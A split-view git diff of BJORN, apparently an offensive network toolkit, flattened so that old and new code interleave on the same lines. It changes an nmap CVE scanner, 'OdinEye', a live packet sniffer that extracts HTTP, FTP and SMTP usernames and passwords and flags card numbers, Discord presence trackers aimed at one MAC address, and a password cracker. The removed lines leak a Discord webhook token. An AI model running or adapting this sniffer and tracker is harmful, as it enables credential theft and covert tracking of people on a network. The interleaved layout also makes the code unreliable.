for script_name, output in (port_info.get('script') or {}).items(): for port in host[proto].keys():
for cve in self.extract_cves(str(output)): discovered_ports_in_batch.add(str(port))
vulnerabilities.append({ port_info = host[proto][port]
'port': port, service = port_info.get('name', '') or ''
'service': service,
'vuln_id': cve,
'script': script_name,
'details': str(output)[:500]
})
if bool(self.shared_data.config.get('scan_cpe', False)): for script_name, output in (port_info.get('script') or {}).items():
ports_for_cpe = list(discovered_ports) if discovered_ports else port_list.split(',') for cve in self.extract_cves(str(output)):
cpes = self.scan_cpe(ip, ports_for_cpe[:10]) vulnerabilities.append({
vulnerabilities.extend(cpes) 'port': port,
'service': service,
'vuln_id': cve,
'script': script_name,
'details': str(output)[:200]
})
# CPE Scan optionnel (sur ce batch)
if bool(self.shared_data.config.get('scan_cpe', False)):
ports_for_cpe = list(discovered_ports_in_batch)
if ports_for_cpe:
vulnerabilities.extend(self.scan_cpe(ip, ports_for_cpe))
return vulnerabilities return vulnerabilities
# ---------------------------- Helpers -------------------------------- #
def _extract_cpe_values(self, port_info: Dict[str, Any]) -> List[str]:
"""Normalise tous les formats possibles de CPE renvoyés par python-nmap."""
cpe = port_info.get('cpe')
if not cpe:
return []
if isinstance(cpe, str):
parts = [x.strip() for x in cpe.splitlines() if x.strip()]
return parts or [cpe]
if isinstance(cpe, (list, tuple, set)):
return [str(x).strip() for x in cpe if str(x).strip()]
try:
return [str(cpe).strip()] if str(cpe).strip() else []
except Exception:
return []
def extract_cves(self, text: str) -> List[str]:
"""Extrait les identifiants CVE d'un texte."""
import re
if not text:
return []
cve_pattern = r'CVE-\d{4}-\d{4,7}'
return re.findall(cve_pattern, str(text), re.IGNORECASE)
def scan_cpe(self, ip: str, ports: List[str]) -> List[Dict]: def scan_cpe(self, ip: str, ports: List[str]) -> List[Dict]:
"""(Fallback lourd) Scan CPE détaillé si demandé.""" cpe_vulns = []
cpe_vulns: List[Dict] = [] nm = nmap.PortScanner() # Instance locale
try: try:
port_list = ','.join([str(p) for p in ports if str(p).strip()]) port_list = ','.join([str(p) for p in ports])
if not port_list: # --version-light à la place de --version-all (bien plus rapide)
return cpe_vulns args = "-sV --version-light -T4 --max-retries 1 --host-timeout 45s"
nm.scan(hosts=ip, ports=port_list, arguments=args)
args = "-sV --version-all -T3 --max-retries 2 --host-timeout 45s" if ip in nm.all_hosts():
logger.info(f"[CPE] nmap {ip} -p {port_list} ({args})") host = nm[ip]
self.nm.scan(hosts=ip, ports=port_list, arguments=args)
if ip in self.nm.all_hosts():
host = self.nm[ip]
for proto in host.all_protocols(): for proto in host.all_protocols():
for port in host[proto].keys(): for port in host[proto].keys():
port_info = host[proto][port] port_info = host[proto][port]
@@ -319,90 +400,61 @@ class NmapVulnScanner:
'service': service, 'service': service,
'vuln_id': f"CPE:{cpe}", 'vuln_id': f"CPE:{cpe}",
'script': 'version-scan', 'script': 'version-scan',
'details': f"CPE detected: {cpe}"[:500] 'details': f"CPE: {cpe}"
}) })
except Exception as e: except Exception as e:
logger.error(f"CPE scan error: {e}") logger.error(f"scan_cpe failed for {ip}: {e}")
return cpe_vulns return cpe_vulns
# ---------------------------- Persistence ---------------------------- # # ---------------------------- Persistence ---------------------------- #
def save_vulnerabilities(self, mac: str, ip: str, findings: List[Dict]): def save_vulnerabilities(self, mac: str, ip: str, findings: List[Dict]):
"""Sépare CPE et CVE, met à jour les statuts + enregistre les nouveautés."""
# Récupérer le hostname depuis la DB
hostname = None hostname = None
try: try:
host_row = self.shared_data.db.query_one( host_row = self.shared_data.db.query_one(
"SELECT hostnames FROM hosts WHERE mac_address=? LIMIT 1", "SELECT hostnames FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
(mac,)
) )
if host_row and host_row.get('hostnames'): if host_row and host_row.get('hostnames'):
hostname = host_row['hostnames'].split(';')[0] hostname = host_row['hostnames'].split(';')[0]
except Exception as e: except Exception:
logger.debug(f"Could not fetch hostname: {e}") pass
# Grouper par port avec les infos complètes findings_by_port: Dict[int, Dict] = {}
findings_by_port = {}
for f in findings: for f in findings:
port = int(f.get('port', 0) or 0) port = int(f.get('port', 0) or 0)
if port not in findings_by_port: if port not in findings_by_port:
findings_by_port[port] = { findings_by_port[port] = {'cves': set(), 'cpes': set()}
'cves': set(),
'cpes': set(),
'findings': []
}
findings_by_port[port]['findings'].append(f)
vid = str(f.get('vuln_id', '')) vid = str(f.get('vuln_id', ''))
if vid.upper().startswith('CVE-'): vid_upper = vid.upper()
if vid_upper.startswith('CVE-'):
findings_by_port[port]['cves'].add(vid) findings_by_port[port]['cves'].add(vid)
elif vid.upper().startswith('CPE:'): elif vid_upper.startswith('CPE:'):
findings_by_port[port]['cpes'].add(vid.split(':', 1)[1]) # On stocke sans le préfixe "CPE:"
elif vid.lower().startswith('cpe:'): findings_by_port[port]['cpes'].add(vid[4:])
findings_by_port[port]['cpes'].add(vid)
# 1) Traiter les CVE par port # 1) CVEs
for port, data in findings_by_port.items(): for port, data in findings_by_port.items():
if data['cves']: for cve in data['cves']:
for cve in data['cves']: try:
try: self.shared_data.db.execute("""
existing = self.shared_data.db.query_one( INSERT INTO vulnerabilities(mac_address, ip, hostname, port, vuln_id, is_active, last_seen)
"SELECT id FROM vulnerabilities WHERE mac_address=? AND vuln_id=? AND port=? LIMIT 1", VALUES(?,?,?,?,?,1,CURRENT_TIMESTAMP)
(mac, cve, port) ON CONFLICT(mac_address, vuln_id, port) DO UPDATE SET
) is_active=1, last_seen=CURRENT_TIMESTAMP, ip=excluded.ip
""", (mac, ip, hostname, port, cve))
if existing: except Exception as e:
self.shared_data.db.execute(""" logger.error(f"Save CVE err: {e}")
UPDATE vulnerabilities
SET ip=?, hostname=?, last_seen=CURRENT_TIMESTAMP, is_active=1
WHERE mac_address=? AND vuln_id=? AND port=?
""", (ip, hostname, mac, cve, port))
else:
self.shared_data.db.execute("""
INSERT INTO vulnerabilities(mac_address, ip, hostname, port, vuln_id, is_active)
VALUES(?,?,?,?,?,1)
""", (mac, ip, hostname, port, cve))
logger.debug(f"Saved CVE {cve} for {ip}:{port}")
except Exception as e:
logger.error(f"Failed to save CVE {cve}: {e}")
# 2) Traiter les CPE # 2) CPEs
for port, data in findings_by_port.items(): for port, data in findings_by_port.items():
for cpe in data['cpes']: for cpe in data['cpes']:
try: try:
self.shared_data.db.add_detected_software( self.shared_data.db.add_detected_software(
mac_address=mac, mac_address=mac, cpe=cpe, ip=ip,
cpe=cpe, hostname=hostname, port=port
ip=ip,
hostname=hostname,
port=port
) )
except Exception as e: except Exception as e:
logger.error(f"Failed to save CPE {cpe}: {e}") logger.error(f"Save CPE err: {e}")
logger.info(f"Saved vulnerabilities for {ip} ({mac}): {len(findings_by_port)} ports processed") logger.info(f"Saved vulnerabilities for {ip}: {len(findings)} findings")

View File

@@ -1,110 +1,85 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
odin_eye.py -- Network traffic analyzer and credential hunter for BJORN.
Uses pyshark to capture and analyze packets in real-time.
"""
import os import os
import json
try: try:
import psutil import pyshark
except Exception: HAS_PYSHARK = True
psutil = None except ImportError:
pyshark = None
HAS_PYSHARK = False
import re
import threading
import time
import logging
from datetime import datetime
def _list_net_ifaces() -> list[str]: from collections import defaultdict
names = set() from typing import Any, Dict, List, Optional
# 1) psutil si dispo
if psutil:
try:
names.update(ifname for ifname in psutil.net_if_addrs().keys() if ifname != "lo")
except Exception:
pass
# 2) fallback kernel
try:
for n in os.listdir("/sys/class/net"):
if n and n != "lo":
names.add(n)
except Exception:
pass
out = ["auto"] + sorted(names)
# sécurité: pas de doublons
seen, unique = set(), []
for x in out:
if x not in seen:
unique.append(x); seen.add(x)
return unique
from logger import Logger
# Hook appelée par le backend avant affichage UI / sync DB logger = Logger(name="odin_eye.py")
def compute_dynamic_b_args(base: dict) -> dict:
"""
Compute dynamic arguments at runtime.
Called by the web interface to populate dropdowns, etc.
"""
d = dict(base or {})
# Example: Dynamic interface list
if "interface" in d:
import psutil
interfaces = ["auto"]
try:
for ifname in psutil.net_if_addrs().keys():
if ifname != "lo":
interfaces.append(ifname)
except:
interfaces.extend(["wlan0", "eth0"])
d["interface"]["choices"] = interfaces
return d
# --- MÉTADONNÉES UI SUPPLÉMENTAIRES ----------------------------------------- # -------------------- Action metadata --------------------
# Exemples darguments (affichage frontend; aussi persisté en DB via sync_actions)
b_examples = [
{"interface": "auto", "filter": "http or ftp", "timeout": 120, "max_packets": 5000, "save_credentials": True},
{"interface": "wlan0", "filter": "(http or smtp) and not broadcast", "timeout": 300, "max_packets": 10000},
]
# Lien MD (peut être un chemin local servi par votre frontend, ou un http(s))
# Exemple: un README markdown stocké dans votre repo
b_docs_url = "docs/actions/OdinEye.md"
# --- Métadonnées d'action (consommées par shared.generate_actions_json) -----
b_class = "OdinEye" b_class = "OdinEye"
b_module = "odin_eye" # nom du fichier sans .py b_module = "odin_eye"
b_enabled = 0 b_status = "odin_eye"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "normal" b_action = "normal"
b_priority = 30
b_cooldown = 0
b_rate_limit = None
b_timeout = 600
b_max_retries = 1
b_stealth_level = 4 # Capturing is passive, but pyshark can be resource intensive
b_risk_level = "low"
b_enabled = 1
b_tags = ["sniff", "pcap", "creds", "network"]
b_category = "recon" b_category = "recon"
b_name = "Odin Eye" b_name = "Odin Eye"
b_description = ( b_description = "Passive network analyzer that hunts for credentials and data patterns."
"Network traffic analyzer for capturing and analyzing data patterns and credentials.\n" b_author = "Bjorn Team"
"Requires: tshark (sudo apt install tshark) + pyshark (pip install pyshark)." b_version = "2.0.1"
)
b_author = "Fabien / Cyberviking"
b_version = "1.0.0"
b_icon = "OdinEye.png" b_icon = "OdinEye.png"
# Schéma d'arguments pour UI dynamique (clé == nom du flag sans '--')
b_args = { b_args = {
"interface": { "interface": {
"type": "select", "label": "Network Interface", "type": "select",
"choices": [], # <- Laisser vide: rempli dynamiquement par compute_dynamic_b_args(...) "label": "Network Interface",
"choices": ["auto", "wlan0", "eth0"],
"default": "auto", "default": "auto",
"help": "Interface à écouter. 'auto' tente de détecter l'interface par défaut." }, "help": "Interface to listen on."
"filter": {"type": "text", "label": "BPF Filter", "default": "(http or ftp or smtp or pop3 or imap or telnet) and not broadcast"}, },
"output": {"type": "text", "label": "Output dir", "default": "/home/bjorn/Bjorn/data/output/packets"}, "filter": {
"timeout": {"type": "number", "label": "Timeout (s)", "min": 10, "max": 36000, "step": 1, "default": 300}, "type": "text",
"max_packets": {"type": "number", "label": "Max packets", "min": 100, "max": 2000000, "step": 100, "default": 10000}, "label": "BPF Filter",
"default": "(http or ftp or smtp or pop3 or imap or telnet) and not broadcast"
},
"max_packets": {
"type": "number",
"label": "Max packets",
"min": 100,
"max": 100000,
"step": 100,
"default": 1000
},
"save_creds": {
"type": "checkbox",
"label": "Save Credentials",
"default": True
}
} }
# ----------------- Code d'analyse (ton code existant) -----------------------
import os, json, pyshark, argparse, logging, re, threading, signal
from datetime import datetime
from collections import defaultdict
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/packets"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "odin_eye_settings.json")
DEFAULT_FILTER = "(http or ftp or smtp or pop3 or imap or telnet) and not broadcast"
CREDENTIAL_PATTERNS = { CREDENTIAL_PATTERNS = {
'http': { 'http': {
'username': [r'username=([^&]+)', r'user=([^&]+)', r'login=([^&]+)'], 'username': [r'username=([^&]+)', r'user=([^&]+)', r'login=([^&]+)'],
@@ -120,297 +95,153 @@ CREDENTIAL_PATTERNS = {
} }
class OdinEye: class OdinEye:
def __init__(self, interface, capture_filter=DEFAULT_FILTER, output_dir=DEFAULT_OUTPUT_DIR, def __init__(self, shared_data):
timeout=300, max_packets=10000): self.shared_data = shared_data
self.interface = interface
self.capture_filter = capture_filter
self.output_dir = output_dir
self.timeout = timeout
self.max_packets = max_packets
self.capture = None self.capture = None
self.stop_capture = threading.Event() self.stop_event = threading.Event()
self.statistics = defaultdict(int) self.statistics = defaultdict(int)
self.credentials = [] self.credentials: List[Dict[str, Any]] = []
self.interesting_patterns = []
self.lock = threading.Lock() self.lock = threading.Lock()
def process_packet(self, packet): def process_packet(self, packet):
"""Analyze a single packet for patterns and credentials."""
try: try:
with self.lock: with self.lock:
self.statistics['total_packets'] += 1 self.statistics['total_packets'] += 1
if hasattr(packet, 'highest_layer'): if hasattr(packet, 'highest_layer'):
self.statistics[packet.highest_layer] += 1 self.statistics[packet.highest_layer] += 1
if hasattr(packet, 'tcp'): if hasattr(packet, 'tcp'):
self.analyze_tcp_packet(packet) # HTTP
except Exception as e: if hasattr(packet, 'http'):
logging.error(f"Error processing packet: {e}") self._analyze_http(packet)
# FTP
elif hasattr(packet, 'ftp'):
self._analyze_ftp(packet)
# SMTP
elif hasattr(packet, 'smtp'):
self._analyze_smtp(packet)
# Payload generic check
if hasattr(packet.tcp, 'payload'):
self._analyze_payload(packet.tcp.payload)
def analyze_tcp_packet(self, packet):
try:
if hasattr(packet, 'http'):
self.analyze_http_packet(packet)
elif hasattr(packet, 'ftp'):
self.analyze_ftp_packet(packet)
elif hasattr(packet, 'smtp'):
self.analyze_smtp_packet(packet)
if hasattr(packet.tcp, 'payload'):
self.analyze_payload(packet.tcp.payload)
except Exception as e: except Exception as e:
logging.error(f"Error analyzing TCP packet: {e}") logger.debug(f"Packet processing error: {e}")
def analyze_http_packet(self, packet): def _analyze_http(self, packet):
try: if hasattr(packet.http, 'request_uri'):
if hasattr(packet.http, 'request_uri'): uri = packet.http.request_uri
for field in ['username', 'password']: for field in ['username', 'password']:
for pattern in CREDENTIAL_PATTERNS['http'][field]: for pattern in CREDENTIAL_PATTERNS['http'][field]:
matches = re.findall(pattern, packet.http.request_uri) m = re.findall(pattern, uri, re.I)
if matches: if m:
with self.lock: self._add_cred('HTTP', field, m[0], getattr(packet.ip, 'src', 'unknown'))
self.credentials.append({
'protocol': 'HTTP',
'type': field,
'value': matches[0],
'timestamp': datetime.now().isoformat(),
'source': packet.ip.src if hasattr(packet, 'ip') else None
})
except Exception as e:
logging.error(f"Error analyzing HTTP packet: {e}")
def analyze_ftp_packet(self, packet): def _analyze_ftp(self, packet):
try: if hasattr(packet.ftp, 'request_command'):
if hasattr(packet.ftp, 'request_command'): cmd = packet.ftp.request_command.upper()
cmd = packet.ftp.request_command.upper() if cmd in ['USER', 'PASS']:
if cmd in ['USER', 'PASS']: field = 'username' if cmd == 'USER' else 'password'
with self.lock: self._add_cred('FTP', field, packet.ftp.request_arg, getattr(packet.ip, 'src', 'unknown'))
self.credentials.append({
'protocol': 'FTP',
'type': 'username' if cmd == 'USER' else 'password',
'value': packet.ftp.request_arg,
'timestamp': datetime.now().isoformat(),
'source': packet.ip.src if hasattr(packet, 'ip') else None
})
except Exception as e:
logging.error(f"Error analyzing FTP packet: {e}")
def analyze_smtp_packet(self, packet): def _analyze_smtp(self, packet):
try: if hasattr(packet.smtp, 'command_line'):
if hasattr(packet.smtp, 'command_line'): line = packet.smtp.command_line
for pattern in CREDENTIAL_PATTERNS['smtp']['auth']: for pattern in CREDENTIAL_PATTERNS['smtp']['auth']:
matches = re.findall(pattern, packet.smtp.command_line) m = re.findall(pattern, line, re.I)
if matches: if m:
with self.lock: self._add_cred('SMTP', 'auth', m[0], getattr(packet.ip, 'src', 'unknown'))
self.credentials.append({
'protocol': 'SMTP',
'type': 'auth',
'value': matches[0],
'timestamp': datetime.now().isoformat(),
'source': packet.ip.src if hasattr(packet, 'ip') else None
})
except Exception as e:
logging.error(f"Error analyzing SMTP packet: {e}")
def analyze_payload(self, payload): def _analyze_payload(self, payload):
patterns = { patterns = {
'email': r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}', 'email': r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}',
'credit_card': r'\b\d{4}[- ]?\d{4}[- ]?\d{4}[- ]?\d{4}\b', 'credit_card': r'\b\d{4}[- ]?\d{4}[- ]?\d{4}[- ]?\d{4}\b'
'ip_address': r'\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'
} }
for name, pattern in patterns.items(): for name, pattern in patterns.items():
matches = re.findall(pattern, payload) m = re.findall(pattern, payload)
if matches: if m:
with self.lock: self.shared_data.log_milestone(b_class, "PatternFound", f"{name} detected in traffic")
self.interesting_patterns.append({
'type': name, def _add_cred(self, proto, field, value, source):
'value': matches[0], with self.lock:
'timestamp': datetime.now().isoformat() cred = {
}) 'protocol': proto,
'type': field,
'value': value,
'timestamp': datetime.now().isoformat(),
'source': source
}
if cred not in self.credentials:
self.credentials.append(cred)
logger.success(f"OdinEye: Credential found! [{proto}] {field}={value}")
self.shared_data.log_milestone(b_class, "Credential", f"{proto} {field} captured")
def execute(self, ip, port, row, status_key) -> str:
"""Standard entry point."""
iface = getattr(self.shared_data, "odin_eye_interface", "auto")
if iface == "auto":
iface = None # pyshark handles None as default
bpf_filter = getattr(self.shared_data, "odin_eye_filter", b_args["filter"]["default"])
max_pkts = int(getattr(self.shared_data, "odin_eye_max_packets", 1000))
timeout = int(getattr(self.shared_data, "odin_eye_timeout", 300))
output_dir = getattr(self.shared_data, "odin_eye_output", "/home/bjorn/Bjorn/data/output/packets")
logger.info(f"OdinEye: Starting capture on {iface or 'default'} (filter: {bpf_filter})")
self.shared_data.log_milestone(b_class, "Startup", f"Sniffing on {iface or 'any'}")
def save_results(self):
try: try:
os.makedirs(self.output_dir, exist_ok=True) self.capture = pyshark.LiveCapture(interface=iface, bpf_filter=bpf_filter)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
stats_file = os.path.join(self.output_dir, f"capture_stats_{timestamp}.json") start_time = time.time()
with open(stats_file, 'w') as f: packet_count = 0
json.dump(dict(self.statistics), f, indent=4)
if self.credentials: # Use sniff_continuously for real-time processing
creds_file = os.path.join(self.output_dir, f"credentials_{timestamp}.json")
with open(creds_file, 'w') as f:
json.dump(self.credentials, f, indent=4)
if self.interesting_patterns:
patterns_file = os.path.join(self.output_dir, f"patterns_{timestamp}.json")
with open(patterns_file, 'w') as f:
json.dump(self.interesting_patterns, f, indent=4)
logging.info(f"Results saved to {self.output_dir}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def execute(self):
try:
# Timeout thread (inchangé) ...
if self.timeout and self.timeout > 0:
def _stop_after():
self.stop_capture.wait(self.timeout)
self.stop_capture.set()
threading.Thread(target=_stop_after, daemon=True).start()
logging.info(...)
self.capture = pyshark.LiveCapture(interface=self.interface, bpf_filter=self.capture_filter)
# Interruption douce — SKIP si on tourne en mode importlib (thread)
if os.environ.get("BJORN_EMBEDDED") != "1":
try:
signal.signal(signal.SIGINT, self.handle_interrupt)
signal.signal(signal.SIGTERM, self.handle_interrupt)
except Exception:
# Ex: ValueError si pas dans le main thread
pass
for packet in self.capture.sniff_continuously(): for packet in self.capture.sniff_continuously():
if self.stop_capture.is_set() or self.statistics['total_packets'] >= self.max_packets: if self.shared_data.orchestrator_should_exit:
break break
if time.time() - start_time > timeout:
logger.info("OdinEye: Timeout reached.")
break
packet_count += 1
if packet_count >= max_pkts:
logger.info("OdinEye: Max packets reached.")
break
self.process_packet(packet) self.process_packet(packet)
# Periodic progress update (every 50 packets)
if packet_count % 50 == 0:
prog = int((packet_count / max_pkts) * 100)
self.shared_data.bjorn_progress = f"{prog}%"
self.shared_data.log_milestone(b_class, "Status", f"Captured {packet_count} packets")
except Exception as e: except Exception as e:
logging.error(f"Capture error: {e}") logger.error(f"Capture error: {e}")
self.shared_data.log_milestone(b_class, "Error", str(e))
return "failed"
finally: finally:
self.cleanup() if self.capture:
try: self.capture.close()
except: pass
# Save results
if self.credentials or self.statistics['total_packets'] > 0:
os.makedirs(output_dir, exist_ok=True)
ts = datetime.now().strftime("%Y%m%d_%H%M%S")
with open(os.path.join(output_dir, f"odin_recon_{ts}.json"), 'w') as f:
json.dump({
"stats": dict(self.statistics),
"credentials": self.credentials
}, f, indent=4)
self.shared_data.log_milestone(b_class, "Complete", f"Capture finished. {len(self.credentials)} creds found.")
def handle_interrupt(self, signum, frame): return "success"
self.stop_capture.set()
def cleanup(self):
if self.capture:
self.capture.close()
self.save_results()
logging.info("Capture completed")
def save_settings(interface, capture_filter, output_dir, timeout, max_packets):
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"interface": interface,
"capture_filter": capture_filter,
"output_dir": output_dir,
"timeout": timeout,
"max_packets": max_packets
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="OdinEye: network traffic analyzer & credential hunter")
parser.add_argument("-i", "--interface", required=False, help="Network interface to monitor")
parser.add_argument("-f", "--filter", default=DEFAULT_FILTER, help="BPF capture filter")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
parser.add_argument("-t", "--timeout", type=int, default=300, help="Capture timeout in seconds")
parser.add_argument("-m", "--max-packets", type=int, default=10000, help="Maximum packets to capture")
args = parser.parse_args()
settings = load_settings()
interface = args.interface or settings.get("interface")
capture_filter = args.filter or settings.get("capture_filter", DEFAULT_FILTER)
output_dir = args.output or settings.get("output_dir", DEFAULT_OUTPUT_DIR)
timeout = args.timeout or settings.get("timeout", 300)
max_packets = args.max_packets or settings.get("max_packets", 10000)
if not interface:
logging.error("Interface is required. Use -i or set it in settings")
return
save_settings(interface, capture_filter, output_dir, timeout, max_packets)
analyzer = OdinEye(interface, capture_filter, output_dir, timeout, max_packets)
analyzer.execute()
if __name__ == "__main__": if __name__ == "__main__":
main() from init_shared import shared_data
eye = OdinEye(shared_data)
eye.execute("0.0.0.0", None, {}, "odin_eye")
"""
# action_template.py
# Example template for a Bjorn action with Neo launcher support
# UI Metadata
b_class = "MyAction"
b_module = "my_action"
b_enabled = 1
b_action = "normal" # normal, aggressive, stealth
b_description = "Description of what this action does"
# Arguments schema for UI
b_args = {
"target": {
"type": "text",
"label": "Target IP/Host",
"default": "192.168.1.1",
"placeholder": "Enter target",
"help": "The target to scan"
},
"port": {
"type": "number",
"label": "Port",
"default": 80,
"min": 1,
"max": 65535
},
"protocol": {
"type": "select",
"label": "Protocol",
"choices": ["tcp", "udp"],
"default": "tcp"
},
"verbose": {
"type": "checkbox",
"label": "Verbose output",
"default": False
},
"timeout": {
"type": "slider",
"label": "Timeout (seconds)",
"min": 10,
"max": 300,
"step": 10,
"default": 60
}
}
def compute_dynamic_b_args(base: dict) -> dict:
# Compute dynamic values at runtime
return base
import argparse
import sys
def main():
parser = argparse.ArgumentParser(description=b_description)
parser.add_argument('--target', default=b_args['target']['default'])
parser.add_argument('--port', type=int, default=b_args['port']['default'])
parser.add_argument('--protocol', choices=b_args['protocol']['choices'],
default=b_args['protocol']['default'])
parser.add_argument('--verbose', action='store_true')
parser.add_argument('--timeout', type=int, default=b_args['timeout']['default'])
args = parser.parse_args()
# Your action logic here
print(f"Starting action with target: {args.target}")
# ...
if __name__ == "__main__":
main()
"""

View File

@@ -10,7 +10,8 @@ PresenceJoin — Sends a Discord webhook when the targeted host JOINS the networ
import requests import requests
from typing import Optional from typing import Optional
import logging import logging
from datetime import datetime, timezone import datetime
from logger import Logger from logger import Logger
from shared import SharedData # only if executed directly for testing from shared import SharedData # only if executed directly for testing
@@ -29,19 +30,19 @@ b_rate_limit = None
b_trigger = "on_join" # <-- Host JOINED the network (OFF -> ON since last scan) b_trigger = "on_join" # <-- Host JOINED the network (OFF -> ON since last scan)
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed
# Replace with your webhook DISCORD_WEBHOOK_URL = "" # Configure via shared_data or DB
DISCORD_WEBHOOK_URL = "https://discordapp.com/api/webhooks/1416433823456956561/MYc2mHuqgK_U8tA96fs2_-S1NVchPzGOzan9EgLr4i8yOQa-3xJ6Z-vMejVrpPfC3OfD"
class PresenceJoin: class PresenceJoin:
def __init__(self, shared_data): def __init__(self, shared_data):
self.shared_data = shared_data self.shared_data = shared_data
def _send(self, text: str) -> None: def _send(self, text: str) -> None:
if not DISCORD_WEBHOOK_URL or "webhooks/" not in DISCORD_WEBHOOK_URL: url = getattr(self.shared_data, 'discord_webhook_url', None) or DISCORD_WEBHOOK_URL
if not url or "webhooks/" not in url:
logger.error("PresenceJoin: DISCORD_WEBHOOK_URL missing/invalid.") logger.error("PresenceJoin: DISCORD_WEBHOOK_URL missing/invalid.")
return return
try: try:
r = requests.post(DISCORD_WEBHOOK_URL, json={"content": text}, timeout=6) r = requests.post(url, json={"content": text}, timeout=6)
if r.status_code < 300: if r.status_code < 300:
logger.info("PresenceJoin: webhook sent.") logger.info("PresenceJoin: webhook sent.")
else: else:
@@ -61,7 +62,8 @@ class PresenceJoin:
ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip() ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
# Add timestamp in UTC # Add timestamp in UTC
timestamp = datetime.now(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC") timestamp = datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
msg = f"✅ **Presence detected**\n" msg = f"✅ **Presence detected**\n"
msg += f"- Host: {host or 'unknown'}\n" msg += f"- Host: {host or 'unknown'}\n"

View File

@@ -10,7 +10,8 @@ PresenceLeave — Sends a Discord webhook when the targeted host LEAVES the netw
import requests import requests
from typing import Optional from typing import Optional
import logging import logging
from datetime import datetime, timezone import datetime
from logger import Logger from logger import Logger
from shared import SharedData # only if executed directly for testing from shared import SharedData # only if executed directly for testing
@@ -30,19 +31,19 @@ b_trigger = "on_leave" # <-- Host LEFT the network (ON -> OFF since last
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed
b_enabled = 1 b_enabled = 1
# Replace with your webhook (can reuse the same as PresenceJoin) DISCORD_WEBHOOK_URL = "" # Configure via shared_data or DB
DISCORD_WEBHOOK_URL = "https://discordapp.com/api/webhooks/1416433823456956561/MYc2mHuqgK_U8tA96fs2_-S1NVchPzGOzan9EgLr4i8yOQa-3xJ6Z-vMejVrpPfC3OfD"
class PresenceLeave: class PresenceLeave:
def __init__(self, shared_data): def __init__(self, shared_data):
self.shared_data = shared_data self.shared_data = shared_data
def _send(self, text: str) -> None: def _send(self, text: str) -> None:
if not DISCORD_WEBHOOK_URL or "webhooks/" not in DISCORD_WEBHOOK_URL: url = getattr(self.shared_data, 'discord_webhook_url', None) or DISCORD_WEBHOOK_URL
if not url or "webhooks/" not in url:
logger.error("PresenceLeave: DISCORD_WEBHOOK_URL missing/invalid.") logger.error("PresenceLeave: DISCORD_WEBHOOK_URL missing/invalid.")
return return
try: try:
r = requests.post(DISCORD_WEBHOOK_URL, json={"content": text}, timeout=6) r = requests.post(url, json={"content": text}, timeout=6)
if r.status_code < 300: if r.status_code < 300:
logger.info("PresenceLeave: webhook sent.") logger.info("PresenceLeave: webhook sent.")
else: else:
@@ -61,7 +62,8 @@ class PresenceLeave:
ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip() ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
# Add timestamp in UTC # Add timestamp in UTC
timestamp = datetime.now(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC") timestamp = datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
msg = f"❌ **Presence lost**\n" msg = f"❌ **Presence lost**\n"
msg += f"- Host: {host or 'unknown'}\n" msg += f"- Host: {host or 'unknown'}\n"

View File

@@ -1,35 +1,52 @@
# Advanced password cracker supporting multiple hash formats and attack methods. #!/usr/bin/env python3
# Saves settings in `/home/bjorn/.settings_bjorn/rune_cracker_settings.json`. # -*- coding: utf-8 -*-
# Automatically loads saved settings if arguments are not provided. """
# -i, --input Input file containing hashes to crack. rune_cracker.py -- Advanced password cracker for BJORN.
# -w, --wordlist Path to password wordlist (default: built-in list). Supports multiple hash formats and uses bruteforce_common for progress tracking.
# -r, --rules Path to rules file for mutations (default: built-in rules). Optimized for Pi Zero 2 (limited CPU/RAM).
# -t, --type Hash type (md5, sha1, sha256, sha512, ntlm). """
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/hashes).
import os import os
import json import json
import hashlib import hashlib
import argparse
from datetime import datetime
import logging
import threading
from concurrent.futures import ThreadPoolExecutor
import itertools
import re import re
import threading
import time
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor
from typing import Any, Dict, List, Optional, Set
from logger import Logger
from actions.bruteforce_common import ProgressTracker, merged_password_plan
logger = Logger(name="rune_cracker.py")
# -------------------- Action metadata --------------------
b_class = "RuneCracker" b_class = "RuneCracker"
b_module = "rune_cracker" b_module = "rune_cracker"
b_enabled = 0 b_status = "rune_cracker"
b_port = None
# Configure logging b_service = "[]"
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s') b_trigger = "on_start"
b_parent = None
# Default settings b_action = "normal"
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/hashes" b_priority = 40
